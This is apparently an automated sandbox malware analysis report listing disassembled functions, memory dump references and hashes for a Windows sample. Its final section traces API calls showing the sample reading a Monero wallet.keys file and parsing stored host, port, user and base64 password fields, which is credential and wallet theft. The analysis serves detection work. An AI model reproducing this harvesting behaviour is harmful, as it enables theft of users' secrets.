                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction ID: da9522ef7242a64c733ecf4b37d787dae31a8b1140eab178acc871e5e4a0f499
                                  • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction Fuzzy Hash: 869166308287916AEB168B7CCC427AAB794FFE6350F14C31AF999724E1FB718681D345
                                  Function 00C1D39E Relevance: .2, Instructions: 242COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction ID: e798cfe420e990fc24b0c6b0339dfdd87db8afc9019c5ef4f6dfd1f46afa711a
                                  • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction Fuzzy Hash: 6BA12072A10A19DBEB19CF55CCC1A9EBBB1FB55314F14C62AD41AE73A0D334AA84CF50
                                  Function 00BE4288 Relevance: .2, Instructions: 240COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction ID: f414410a75c1b5229cac6ad114a3ce18e67ce4fb9e8844c4a7bbf0c80bfc54ae
                                  • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction Fuzzy Hash: 8BA17F72E083519BD308CF65C89075BF7E2EFC8710F1ACA3DA8A997254D774E8419B82
                                  Function 010CE2EC Relevance: .2, Instructions: 193COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 922e605ceea91c14dba8fda932fe174109074c098e8a21d0d19e39c05c69ae1e
                                  • Instruction ID: a1746f7045c39e9ece66748c3da15a476f43516c7bead61c181d97079413b341
                                  • Opcode Fuzzy Hash: 922e605ceea91c14dba8fda932fe174109074c098e8a21d0d19e39c05c69ae1e
                                  • Instruction Fuzzy Hash: C551F7B3A0C510DBD3085B18EC5953EFEAAAB94A50F16853EE5C797344E97128018F97
                                  Function 00F84B2A Relevance: .2, Instructions: 183COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6130326437054d0442b24b6454b03becf38faabe2de4558289ce54037d16844
                                  • Instruction ID: 9abceb25caf5635fe73ce2fd47dbce6ec02c73c9970590710481aa3e9b5aaba6
                                  • Opcode Fuzzy Hash: a6130326437054d0442b24b6454b03becf38faabe2de4558289ce54037d16844
                                  • Instruction Fuzzy Hash: 035136F39092249FE304AE3DDC5537ABBD5EB85320F2B863DDA88D7784E935480586C6
                                  Function 00E98939 Relevance: .2, Instructions: 173COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d71257c8a0eafba88e3c607418e32697df1452658efee59bcc2656664d07fe83
                                  • Instruction ID: c5f0a67f572421878dfbb2930d117f43e2a1707f7a71e15fbef2a7bf7dbbcf9f
                                  • Opcode Fuzzy Hash: d71257c8a0eafba88e3c607418e32697df1452658efee59bcc2656664d07fe83
                                  • Instruction Fuzzy Hash: CA5117F36182009BF308AE3DEC8973ABAD6DF94720F1A463DD6D5C77C4D9395804864A
                                  Function 00FC1D37 Relevance: .2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec00cd3279aaaf8448ffb3edca824dd8aaa824c14ab4c7838bcd8ff2875b30ec
                                  • Instruction ID: d6dccbbc558662346b4b5bea187ea6118874113fae152b56321e0b4805dbc1ce
                                  • Opcode Fuzzy Hash: ec00cd3279aaaf8448ffb3edca824dd8aaa824c14ab4c7838bcd8ff2875b30ec
                                  • Instruction Fuzzy Hash: 134116F37192086FE300A97EEC4477BB79ADBD4364F2A863AE794C3794E83958064191
                                  Function 00FC41EC Relevance: .2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e89752d0818089b8cb5e0a472ec1c933a2f0ed365e311ac1e1f79537b7214ba
                                  • Instruction ID: 5ac513a418bcff8d1c94fb4948399c3aa6d307558c88a11da6d32d3343ee2614
                                  • Opcode Fuzzy Hash: 9e89752d0818089b8cb5e0a472ec1c933a2f0ed365e311ac1e1f79537b7214ba
                                  • Instruction Fuzzy Hash: CD414AF39082084BF3146D39ED457B7BBD6D794320F16863DDA88D3B80ED3958058286
                                  Function 00C16799 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: 79fd28d4ac664d2cf80c248ae9effe174ab67b0db4583eaa5072557287401dd9
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: 2B513B62E09BD58AD7058B7544502EEBFB21FE6210F1E829EC4981F383C3759689D3E5
                                  Function 00BE75A8 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Function 00BB9AA0 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00BB03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00BC0DBF,00BC0DBE,00BC0DBB,00BC0DBA), ref: 00BB04C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB04C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BB04E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB04F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BB052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00BB0579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB0587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BB05C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB05D5
